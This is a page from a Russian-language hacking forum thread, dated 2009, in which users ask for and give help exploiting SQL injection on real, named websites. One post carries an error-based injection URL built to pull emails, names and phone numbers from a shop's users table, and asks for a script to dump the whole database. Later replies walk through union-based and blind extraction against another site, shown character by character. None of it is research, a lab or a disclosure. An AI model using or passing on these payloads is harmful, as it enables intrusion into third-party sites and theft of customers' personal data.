HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 925 из 2422 « Первая < 425825875915 921 922 923 924 925 926 927 928 929 935975102514251925 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.10.2009, 20:07
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426

Репутация: 5
По умолчанию
Как сделать дамб БД при таком раскладе
Код:
http://www.steroids-pharma.com/product_search.php?query=mk%%27+and+(select+*+from+(select+*+from+(select+name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1),name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1))a)b)
Пробовал через concat_ws and group_concat ничего неполучилось,может есть прога или скрипт который автоматически будет добавлять лимит и записывать данные в файл(проги конечно есть такие,но с такой скулей наврялти запашет).
 
Ответить с цитированием

  #2  
Старый 13.10.2009, 20:41
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от 2Fed123  
Как сделать дамб БД при таком раскладе
Код:
http://www.steroids-pharma.com/product_search.php?query=mk%%27+and+(select+*+from+(select+*+from+(select+name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1),name_const((select+concat(email,0x3a,first_name,0x3a,last_name,0x3a,phone)+from+users+limit+0,1),1))a)b)
Пробовал через concat_ws and group_concat ничего неполучилось,может есть прога или скрипт который автоматически будет добавлять лимит и записывать данные в файл(проги конечно есть такие,но с такой скулей наврялти запашет).
Проще будет самому написать.
 
Ответить с цитированием

  #3  
Старый 13.10.2009, 20:22
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию
to 2Fed123
видел я парсер на перле, помоему его в последнем хакере выкладывали
 
Ответить с цитированием

  #4  
Старый 13.10.2009, 20:48
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426

Репутация: 5
По умолчанию
Ctacok
Напиши,буду очень признателен
 
Ответить с цитированием

  #5  
Старый 13.10.2009, 20:51
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию
Цитата:
Сообщение от 2Fed123  
Ctacok
Напиши,буду очень признателен
Не силён в Perl.
Попробуй сам написать.
Если будут вопросы пиши сюда:
https://forum.antichat.ru/
threadedpost1594515.html#post1594515 .

Это если на PHP будешь писать.

А если на Perl:
https://forum.antichat.ru/thread40897.html
 
Ответить с цитированием

  #6  
Старый 13.10.2009, 22:29
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию
Ctacok жжет ))
2Fed123 цык
разберешся там просто
цэ грабер с хакера
 
Ответить с цитированием

  #7  
Старый 14.10.2009, 12:10
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию
Помогите раскрутить скулю (добиться вывода)...

узнаем что есть 21 поле
http://www.enext.ua/index.php?node=770+order+by+21--

http://www.enext.ua/index.php?node=-770+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--
вывода нет...
 
Ответить с цитированием

  #8  
Старый 14.10.2009, 14:14
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
Ща набегут и помогут, а пока вот,пробуй сам раскрутить)
Цитата:
http://www.enext.ua/index.php?node=0+and+substring(version(),1,1)=5
 
Ответить с цитированием

  #9  
Старый 14.10.2009, 16:28
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию
Цитата:
Сообщение от $n@ke  
Ща набегут и помогут, а пока вот,пробуй сам раскрутить)
чет не получается... начал перечитывать статью по символьному перебору https://forum.antichat.ru/showpost.php?p=407227&postcount=3 но понял, что вроде как не в ту сторону копаю...
Может распишешь запрос к выводу, а я по аналогии разберусь с этим примером...
 
Ответить с цитированием

  #10  
Старый 14.10.2009, 18:05
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию
pelligrim в ту сторону копаеш, только твой вывод это правильно отображение странички (т.е. правильное выполнение запроса), а тут смотри выводим версию бд
Код:
http://www.enext.ua/index.php?node=0+and+substring(version(),1,1)=5 => 1 символ равняеться 5
http://www.enext.ua/index.php?node=0+and+ascii(lower(substring(version(),2,1)))=0x2E => так опряделяем точку
http://www.enext.ua/index.php?node=0+and+substring(version(),3,1)=0 => тут ноль
http://www.enext.ua/index.php?node=0+and+ascii(lower(substring(version(),4,1)))=0x2E
http://www.enext.ua/index.php?node=0+and+substring(version(),5,1)=7  => ну и тут 2 семерки
http://www.enext.ua/index.php?node=0+and+substring(version(),6,1)=7
в итоге получаем версию мускула - 5.0.77
 
Ответить с цитированием
Ответ
Страница 925 из 2422 « Первая < 425825875915 921 922 923 924 925 926 927 928 929 935975102514251925 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.